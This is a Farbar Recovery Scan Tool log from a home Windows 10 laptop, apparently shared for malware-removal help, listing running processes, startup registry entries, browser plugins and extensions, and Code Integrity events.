  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-09 11:41:44.385
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-09 11:41:44.278
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-09 11:41:44.169
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.


==================== Memory info ===========================

Processor: Intel® Core i5 CPU M 520 @ 2.40GHz
Percentage of memory in use: 69%
Total physical RAM: 3890.67 MB
Available physical RAM: 1197.64 MB
Total Virtual: 8754.67 MB
Available Virtual: 5846.27 MB

==================== Drives ================================

Drive c: (TI105835W0O) (Fixed) (Total:453.17 GB) (Free:111.73 GB) NTFS ==>[system with boot components (obtained from drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: E56E3D6C)
Partition 1: (Active) - (Size=1.5 GB) - (Type=27)
Partition 2: (Not Active) - (Size=453.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=511 MB) - (Type=27)
Partition 4: (Not Active) - (Size=10.6 GB) - (Type=17)

==================== End of Addition.txt ============================


Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
Ran by Lexi (administrator) on DURABLE (09-03-2016 14:51:01)
Running from C:\Users\Lexi\Downloads
Loaded Profiles: Lexi (Available Profiles: Lexi & DefaultAppPool)
Platform: Windows 10 Home (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Edge)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RTKAUDIOSERVICE64.EXE
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Amazon.com) C:\Program Files (x86)\Amazon\Amazon Unbox Video\ADVWindowsClientService.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Apple Inc.) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(LeapFrog Enterprises, Inc.) C:\Program Files (x86)\LeapFrog\LeapFrog Connect\CommandService.exe
(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.3.198\ccSvcHst.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(TOSHIBA Corporation) C:\Windows\System32\TODDSrv.exe
(TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\TecoService.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.3.198\ccSvcHst.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler64.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TPwrMain.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\SmoothView\SmoothView.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\Teco.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\SmartFaceV\SmartFaceVWatcher.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\BulletinBoard\TosNcCore.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\ReelTime\TosReelTimeMonitor.exe
() C:\Program Files\TOSHIBA\FlashCards\Hotkey\TCrdKBB.exe
(Intel Corporation) C:\Windows\System32\igfxext.exe
(PFU LIMITED) C:\Program Files (x86)\PFU\ScanSnap\CardMinder\CardLauncher.exe
(Amazon Digital Services, LLC.) C:\Users\Lexi\AppData\Local\Apps\2.0\2DJ030TV.4OO\2H60B505.COR\amaz..tion_f2fa081ea2183235_0002.0001_cb34a912a946f839\AmazonCloudDrive.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe
(Evernote Corp., 305 Walnut Street, Redwood City, CA 94063) C:\Program Files (x86)\Evernote\Evernote\EvernoteClipper.exe
(TOSHIBA CORPORATION.) C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe
(LeapFrog Enterprises, Inc.) C:\Program Files (x86)\LeapFrog\LeapFrog Connect\Monitor.exe
(LG Electronics) C:\ProgramData\LGMOBILEAX\BYR_Client\VZWUAAgent.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Sun Microsystems, Inc.) C:\Users\Lexi\AppData\Local\Apps\2.0\2DJ030TV.4OO\2H60B505.COR\amaz..tion_f2fa081ea2183235_0002.0001_cb34a912a946f839\LocalServiceJre\bin\AmazonCloudDriveW.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TPHM\TPCHSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSENotify.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TPHM\TPCHWMsg.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [16174328 2015-09-28] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1411840 2015-09-28] (Realtek Semiconductor)
HKLM\...\Run: [ThpSrv] => C:\windows\system32\thpsrv /logon
HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [505696 2009-11-06] (TOSHIBA Corporation)
HKLM\...\Run: [HSON] => C:\Program Files\TOSHIBA\TBS\HSON.exe [52600 2009-03-09] (TOSHIBA Corporation)
HKLM\...\Run: [smoothView] => C:\Program Files\Toshiba\SmoothView\SmoothView.exe [508216 2009-07-28] (TOSHIBA Corporation)
HKLM\...\Run: [00TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [913720 2010-03-25] (TOSHIBA Corporation)
HKLM\...\Run: [Teco] => C:\Program Files\TOSHIBA\TECO\Teco.exe [1489760 2010-04-06] (TOSHIBA Corporation)
HKLM\...\Run: [TosWaitSrv] => C:\Program Files\TOSHIBA\TPHM\TosWaitSrv.exe [705368 2010-02-23] (TOSHIBA Corporation)
HKLM\...\Run: [smartFaceVWatcher] => C:\Program Files\Toshiba\SmartFaceV\SmartFaceVWatcher.exe [238080 2009-10-19] (TOSHIBA Corporation)
HKLM\...\Run: [TosVolRegulator] => C:\Program Files\TOSHIBA\TosVolRegulator\TosVolRegulator.exe [24376 2009-11-11] (TOSHIBA Corporation)
HKLM\...\Run: [TosSENotify] => C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe [709976 2010-02-05] (TOSHIBA Corporation)
HKLM\...\Run: [TosNC] => C:\Program Files\Toshiba\BulletinBoard\TosNcCore.exe [595816 2010-03-19] (TOSHIBA Corporation)
HKLM\...\Run: [TosReelTimeMonitor] => C:\Program Files\TOSHIBA\ReelTime\TosReelTimeMonitor.exe [35672 2010-03-03] (TOSHIBA Corporation)
HKLM\...\Run: [synTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3944648 2015-06-12] (Synaptics Incorporated)
HKLM-x32\...\Run: [KeNotify] => C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe [34160 2009-12-25] (TOSHIBA CORPORATION)
HKLM-x32\...\Run: [HWSetup] => C:\Program Files\TOSHIBA\Utilities\HWSetup.exe [423936 2010-03-04] (TOSHIBA Electronics, Inc.)
HKLM-x32\...\Run: [sVPWUTIL] => C:\Program Files (x86)\TOSHIBA\Utilities\SVPWUTIL.exe [352256 2010-02-22] (TOSHIBA CORPORATION)
HKLM-x32\...\Run: [TWebCamera] => C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe [2454840 2010-02-24] (TOSHIBA CORPORATION.)
HKLM-x32\...\Run: [TSleepSrv] => C:\Program Files (x86)\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe [252728 2010-03-17] (TOSHIBA)
HKLM-x32\...\Run: [NortonOnlineBackupReminder] => C:\Program Files (x86)\TOSHIBA\Toshiba Online Backup\Activation\TobuActivation.exe [529256 2009-08-10] (Toshiba)
HKLM-x32\...\Run: [secure Online Account Numbers] => C:\Program Files (x86)\Discover\SOAN\DiscoverSOAN.exe [376832 2010-03-05] (Orbiscom Ltd. All rights reserved.)
HKLM-x32\...\Run: [brMfcWnd] => C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe [1159168 2009-05-26] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [ControlCenter3] => C:\Program Files (x86)\Brother\ControlCenter3\brctrcen.exe [114688 2008-12-24] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [scanSnap WIA Service Checker] => C:\windows\SSDriver\fi5110\SsWiaChecker.exe
HKLM-x32\...\Run: [Monitor] => C:\Program Files (x86)\LeapFrog\LeapFrog Connect\Monitor.exe [118272 2014-07-11] (LeapFrog Enterprises, Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2011-07-05] (Apple Inc.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [421736 2011-08-19] (Apple Inc.)
HKLM-x32\...\Run: [bYRUA_AGENT] => C:\ProgramData\LGMOBILEAX\BYR_Client\VZWUAAgent.exe [380024 2012-09-24] (LG Electronics)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1085656 2015-12-13] (Adobe Systems Incorporated)
Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Run: [GoogleChromeAutoLaunch_AC2BF96DE3E4AFDBE25411FD527B2AD1] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [746648 2016-02-17] (Google Inc.)
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Run: [FileThis Fetch] => C:\Program Files (x86)\FileThis\FileThis Fetch\FileThis Fetch.exe [350208 2013-05-24] (FileThis)
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2010-05-28] (Google Inc.)
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Run: [skitch] => C:\Program Files (x86)\Evernote\Skitch\Skitch.exe [4304704 2013-08-09] (Evernote)
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Policies\Explorer: [NoSetActiveDesktop] 0
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Amazon Unbox.lnk [2012-12-12]
ShortcutTarget: Amazon Unbox.lnk -> C:\Program Files (x86)\Amazon\Amazon Unbox Video\ADVWindowsClientSystemTray.exe (Amazon.com)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Audible Download Manager.lnk [2010-09-24]
ShortcutTarget: Audible Download Manager.lnk -> C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe (Audible, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\BodyMedia Sync.lnk [2013-01-17]
ShortcutTarget: BodyMedia Sync.lnk -> C:\Program Files (x86)\BodyMedia\Sync\BodyMediaSync.exe (BodyMedia, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CardMinder Viewer.lnk [2011-07-19]
ShortcutTarget: CardMinder Viewer.lnk -> C:\Program Files (x86)\PFU\ScanSnap\CardMinder\CardLauncher.exe (PFU LIMITED)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Conversion to PDF with ScanSnap Organizer.lnk [2011-07-19]
ShortcutTarget: Conversion to PDF with ScanSnap Organizer.lnk -> C:\Program Files (x86)\PFU\ScanSnap\Organizer\PfuSsOrgOcrChk.exe (PFU LIMITED)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ScanSnap Manager.lnk [2013-05-28]
ShortcutTarget: ScanSnap Manager.lnk -> C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsMon.exe (PFU LIMITED)
Startup: C:\Users\Lexi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Amazon Cloud Drive.lnk [2016-03-09]
ShortcutTarget: Amazon Cloud Drive.lnk -> C:\Users\Lexi\AppData\Local\Apps\2.0\2DJ030TV.4OO\2H60B505.COR\amaz..tion_f2fa081ea2183235_0002.0001_cb34a912a946f839\AmazonCloudDrive.exe (Amazon Digital Services, LLC.)
Startup: C:\Users\Lexi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EvernoteClipper.lnk [2015-07-31]
ShortcutTarget: EvernoteClipper.lnk -> C:\Program Files (x86)\Evernote\Evernote\EvernoteClipper.exe (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{0377792b-7629-45e2-ae76-3047b41ccf06}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{69348f7a-a204-4307-bdbe-d51a41143651}: [DhcpNameServer] 10.0.5.3 10.0.5.2

Internet Explorer:
==================
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com/ig/redirectdomain?brand=TSNA&bmod=TSNA
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Start Page Restore = hxxp://www.google.com/calendar/render?hl=en&tab=wc&gsessionid=pOBMFiDq2Uvgtsn9Tik9KQ
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://www.facebook.com/
hxxps://www.google.com/calendar/render?hl=en&tab=wc&pli=1&gsessionid=OK
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://www.google.com/ie
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com/ie
SearchScopes: HKLM -> DefaultScope {60C66211-88F6-486E-8303-B0B10E4FD293} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNA
SearchScopes: HKLM -> {60C66211-88F6-486E-8303-B0B10E4FD293} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNA
SearchScopes: HKLM-x32 -> DefaultScope {B1243C39-DE64-4E02-BC80-265B7BD496B1} URL =
SearchScopes: HKLM-x32 -> {9D2BF1CD-96EB-4EA4-9D12-EEAA66D4FC8D} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNA
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {23758B0B-0D9F-32A3-A476-D9B1033E7A1E} URL = hxxp://www.bing.com/search?q={searchTerms}&pc=ZUGO&form=ZGAIDF
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {57A65587-8AEC-4FF9-A3A3-32330322F26B} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNA_enUS393US394
BHO: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll [2013-07-29] (Oracle Corporation)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-01-02] (Google Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll [2013-07-29] (Oracle Corporation)
BHO-x32: Secure Online Account Numbers Helper -> {435EAA86-D32B-484F-869C-53745FCB1642} -> C:\Program Files (x86)\Discover\SOAN\DiscoverSOANHelper.dll [2010-03-05] (Orbiscom Ltd. All rights reserved.)
BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Oracle\JavaFX 2.1 Runtime\bin\ssv.dll [2012-05-04] (Oracle Corporation)
BHO-x32: Evernote extension -> {92EF2EAD-A7CE-4424-B0DB-499CF856608E} -> C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll [2015-12-01] (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-01-02] (Google Inc.)
BHO-x32: Skype Plug-In -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2010-11-22] (Skype Technologies S.A.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Oracle\JavaFX 2.1 Runtime\bin\jp2ssv.dll [2012-05-04] (Oracle Corporation)
BHO-x32: Google Gears Helper -> {E0FEFE40-FBF9-42AE-BA58-794CA7E3FB53} -> C:\Program Files (x86)\Google\Google Gears\Internet Explorer\0.5.36.0\gears.dll [2010-02-23] (Google Inc.)
BHO-x32: TOSHIBA Media Controller Plug-in -> {F3C88694-EFFA-4d78-B409-54B7B2535B14} -> C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\TOSHIBAMediaControllerIE.dll [2010-03-19] (<TOSHIBA>)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-01-02] (Google Inc.)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-01-02] (Google Inc.)
Toolbar: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-01-02] (Google Inc.)
Handler-x32: belarc - {6318E0AB-2E93-11D1-B8ED-00608CC9A71F} - C:\Program Files (x86)\Belarc\BelarcAdvisor\System\BAVoilaX.dll [2013-03-29] (Belarc, Inc.)
Handler-x32: cozi - {5356518D-FE9C-4E08-9C1F-1E872ECD367F} - C:\Program Files (x86)\Cozi Express\CoziProtocolHandler.dll [2010-12-29] (Cozi Group, Inc.)
Handler-x32: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2010-11-22] (Skype Technologies S.A.)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF ProfilePath: C:\Users\Lexi\AppData\Roaming\Mozilla\Firefox\Profiles\s9ln76d7.default-1398562510049
FF NewTab: about:newtab
FF DefaultSearchEngine: Search Provided by Yahoo
FF DefaultSearchEngine.US: Google
FF SelectedSearchEngine: Search Provided by Yahoo
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_20_0_0_306.dll [2016-02-10] ()
FF Plugin: @java.com/DTPlugin,version=10.25.2 -> C:\windows\system32\npDeployJava1.dll [2013-07-29] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.25.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll [2013-07-29] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_306.dll [2016-02-10] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2011-07-29] ()
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2013-01-11] (Foxit Corporation)
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2013-10-07] (Google)
FF Plugin-x32: @java.com/DTPlugin,version=10.25.2 -> C:\windows\SysWOW64\npDeployJava1.dll [2013-07-29] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.5.1 -> C:\Program Files (x86)\Oracle\JavaFX 2.1 Runtime\bin\plugin2\npjp2.dll [2012-05-04] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MIF5BA~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MIF5BA~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-09-23] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-12-17] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-2574262253-2623044021-4024016403-1001: amazon.com/AmazonMP3DownloaderPlugin -> C:\Program Files (x86)\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin1017300.dll [2012-08-28] (Amazon.com, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPcol400.dll [2010-12-14] (Catalina Marketing Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPcol500.dll [2010-12-14] (Catalina Marketing Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2015-06-29] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin2.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin3.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin4.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin5.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin6.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin7.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\browser\plugins\npMozCouponPrinter.dll [2012-10-19] (Coupons, Inc.)
FF Extension: Evernote Web Clipper - C:\Users\Lexi\AppData\Roaming\Mozilla\Firefox\Profiles\s9ln76d7.default-1398562510049\Extensions\{E0B8C461-F8FB-49b4-8373-FE32E9252800}.xpi [2015-12-08]
FF Extension: Skype extension - C:\Program Files (x86)\Mozilla Firefox\extensions\{AB2CE124-6272-4b12-94A9-7303C7397BD1} [2016-01-12] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{000a9d1c-beef-4f90-9363-039d445309b8}] - C:\Program Files (x86)\Google\Google Gears\Firefox
FF Extension: Google Gears - C:\Program Files (x86)\Google\Google Gears\Firefox [2010-08-20] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [discoversoan@orbiscom] - C:\Program Files (x86)\Discover\SOAN
FF Extension: Secure Online Account Numbers - C:\Program Files (x86)\Discover\SOAN [2010-11-20] [not signed]

Chrome:
=======
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.75\PepperFlash\pepflashplayer.dll => No File
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.75\ppGoogleNaClPluginChrome.dll => No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.75\pdf.dll => No File
CHR Plugin: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll => No File
CHR Plugin: (CouponNetwork Coupon Activator Netscape Plugin v. 5.0.0.0) - C:\Program Files (x86)\Mozilla Firefox\plugins\NPcol400.dll (Catalina Marketing Corporation)
